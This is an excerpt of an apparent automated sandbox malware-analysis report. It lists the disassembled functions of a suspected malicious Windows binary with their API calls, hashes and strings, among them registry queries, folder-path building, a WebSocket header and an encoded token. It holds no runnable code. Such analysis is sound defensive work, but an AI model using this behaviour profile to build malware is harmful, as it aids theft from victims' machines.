                              • Instruction ID: b2bb91279ed191ea438feaad77f13b5f00d7992ecb6f8ec1d7c62ea95ed40f5f
                              • Opcode Fuzzy Hash: 16a6be6b4306c747f1b1d8b86c21e4e8aff724b2b17c4125459aff901373f41f
                              • Instruction Fuzzy Hash: 4221E2B1518301EF8750DF69D88495BBBF8EEC8314F409E1EF599D3224E735D5088BA2
                              Function 00E53130 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E53166
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5316D
                              • RegOpenKeyExA.ADVAPI32(80000002,00D1BB90,00000000,00020119,?), ref: 00E5318C
                              • RegQueryValueExA.ADVAPI32(?,00D2E398,00000000,00000000,00000000,000000FF), ref: 00E531A7
                              • RegCloseKey.ADVAPI32(?), ref: 00E531B1
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 52e425a9e5f16c63c751d65dce44598e017a1e67a4afa880f1298960e69004ec
                              • Instruction ID: 83e44a4be21c2f0aa762980d9944cdf3a6fc095daf0ba9d2a9e62f2d9fc0787b
                              • Opcode Fuzzy Hash: 52e425a9e5f16c63c751d65dce44598e017a1e67a4afa880f1298960e69004ec
                              • Instruction Fuzzy Hash: D71142B6A40309AFD720CF94D945FABBBBCEB44715F00462AFA05E3684D77559048BA1
                              Function 00E38980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1D5
                                • Part of subcall function 00E5A1C0: std::exception::exception.LIBCMT ref: 00E5A1FB
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E389CD
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: invalid string position$string too long
                              • API String ID: 2002836212-4289949731
                              • Opcode ID: 5a7c27bf2a80857edcc84ac12e26a7020a5db68d6e2af246997922ecfca98df5
                              • Instruction ID: d8c2031c2d467293afc2f1181a9d95adb4fa88f2aa5ac740c1c7fd1cc963ea49
                              • Opcode Fuzzy Hash: 5a7c27bf2a80857edcc84ac12e26a7020a5db68d6e2af246997922ecfca98df5
                              • Instruction Fuzzy Hash: 7D21D6723007504BC7219A6CE944A6AFBE9DBE17A1F14293FF145DB281CB71DC41C3A6
                              Function 00E38850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38883
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: f1030f8a3e7b60743c62053317c322cde2aee03a2d854c193ad56b2042435584
                              • Instruction ID: 622d7672b7a10cd40c00efc4c532116571176bf6075ccedc1e66704731c754c7
                              • Opcode Fuzzy Hash: f1030f8a3e7b60743c62053317c322cde2aee03a2d854c193ad56b2042435584
                              • Instruction Fuzzy Hash: C631BBB5E005159FCB08DF58C9916ADBBB6EB88350F18C269E915EF384DB30AD01CBD1
                              Function 00E55910 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55922
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E55935
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_std::exception::exception
                              • String ID: Sec-WebSocket-Version: 13$string too long
                              • API String ID: 1928653953-3304177573
                              • Opcode ID: 2f45ba4dc9a47fcf71be4391d870a8b7e30231819567c657aa27340364611de6
                              • Instruction ID: e5ac89477e78981571a8004fd7c34316b8846fccfac5d5d977afc68b49996aaf
                              • Opcode Fuzzy Hash: 2f45ba4dc9a47fcf71be4391d870a8b7e30231819567c657aa27340364611de6
                              • Instruction Fuzzy Hash: C0118232304B40CBC7328B2CE810719B7E1EBD6762F252F6DE8E1A7695C765D849C7A1
                              Function 00E53CC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00E5A430,000000FF), ref: 00E53D20
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E53D27
                              • wsprintfA.USER32 ref: 00E53D37
                                • Part of subcall function 00E571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E571FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: abd4dfee743f906bb5f691d723e45092ecbf0c5e1527aac305cf7204a6544b1b
                              • Instruction ID: 8f6d788cacfee4a1d00b620b9268cc533c8071bdf330c0bcf9084d2a0710f979
                              • Opcode Fuzzy Hash: abd4dfee743f906bb5f691d723e45092ecbf0c5e1527aac305cf7204a6544b1b
                              • Instruction Fuzzy Hash: F001C071644700BFE7305B54DC0AF6ABB78FB45B66F000115FE45A76D0C7BA1900CBA1
                              Function 00E5926D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00E59279
                                • Part of subcall function 00E587FF: __amsg_exit.LIBCMT ref: 00E5880F
                              • __amsg_exit.LIBCMT ref: 00E59299
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit$__getptd
                              • String ID: Xu$Xu
                              • API String ID: 441000147-2934775391
                              • Opcode ID: c05c3309c6e4ecc78f1231a90079a65a512f764a0b95ae9597f7d38822a3ad72
                              • Instruction ID: 1f3c06db42176a2e6797a9ebbc5ecdb2e1e77e3a641d6877a2e856c6abb7febf
                              • Opcode Fuzzy Hash: c05c3309c6e4ecc78f1231a90079a65a512f764a0b95ae9597f7d38822a3ad72
                              • Instruction Fuzzy Hash: 9C01043691A721EBD710AB29B4057DE73E06F01B6AF152805EC80771A2CB706C89CBD5
                              Function 00E38710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E38737
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A188
                                • Part of subcall function 00E5A173: std::exception::exception.LIBCMT ref: 00E5A1AE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long$yxxx$yxxx
                              • API String ID: 2002836212-1517697755
                              • Opcode ID: 31c03a08b950551bb31a2374cfe66104021da3d76f62ac4fcdf492275e3044d6
                              • Instruction ID: 177bebbefe246e28506ba8c58dd41745b77f75a91fd982b40df602be4958feb1
                              • Opcode Fuzzy Hash: 31c03a08b950551bb31a2374cfe66104021da3d76f62ac4fcdf492275e3044d6
                              • Instruction Fuzzy Hash: 70F0F023B001210F8304643D8E880AEAC4797E039073AE722F84AFF299EC71EC82C1D0
                              Function 00E586D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E5781C: __mtinitlocknum.LIBCMT ref: 00E57832
                                • Part of subcall function 00E5781C: __amsg_exit.LIBCMT ref: 00E5783E
                              • ___addlocaleref.LIBCMT ref: 00E58756
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                              • String ID: KERNEL32.DLL$Xu$xt
                              • API String ID: 3105635775-2689811054
                              • Opcode ID: 90f204bf632e433a1f89a69bf8bf164a79cec42dbcf07e9a4d4986ebfa69bde0
                              • Instruction ID: 60b430fd1ccd7f5f5a650240b482ca7cd1ab2b84361ab9d689f2db5526390d71
                              • Opcode Fuzzy Hash: 90f204bf632e433a1f89a69bf8bf164a79cec42dbcf07e9a4d4986ebfa69bde0
                              • Instruction Fuzzy Hash: C8018871545700DEE720AF75E80974AB7E0AF50315F20AD4EE8D6B76E1CBB0A548CB11
                              Function 00E4E500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4E544
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E573
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E581
                              • lstrcat.KERNEL32(?,00D2E318), ref: 00E4E59C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 89059040d6f090ed3b7a05ac24e437f62aedf0ab1905819f0b943338ad15d3e2
                              • Instruction ID: 47cfa27f2a0ade4e3e1d7b0f4da3f04ea6161c41c3960303ee24e581b9dce5f0
                              • Opcode Fuzzy Hash: 89059040d6f090ed3b7a05ac24e437f62aedf0ab1905819f0b943338ad15d3e2
                              • Instruction Fuzzy Hash: 3A51C671A10208AFD764EB54EC46EEE37B8FB48300F045899FA45A7345DA75AE44CBA0
                              Function 00E51FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00E51FDF, 00E51FF5, 00E520B7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
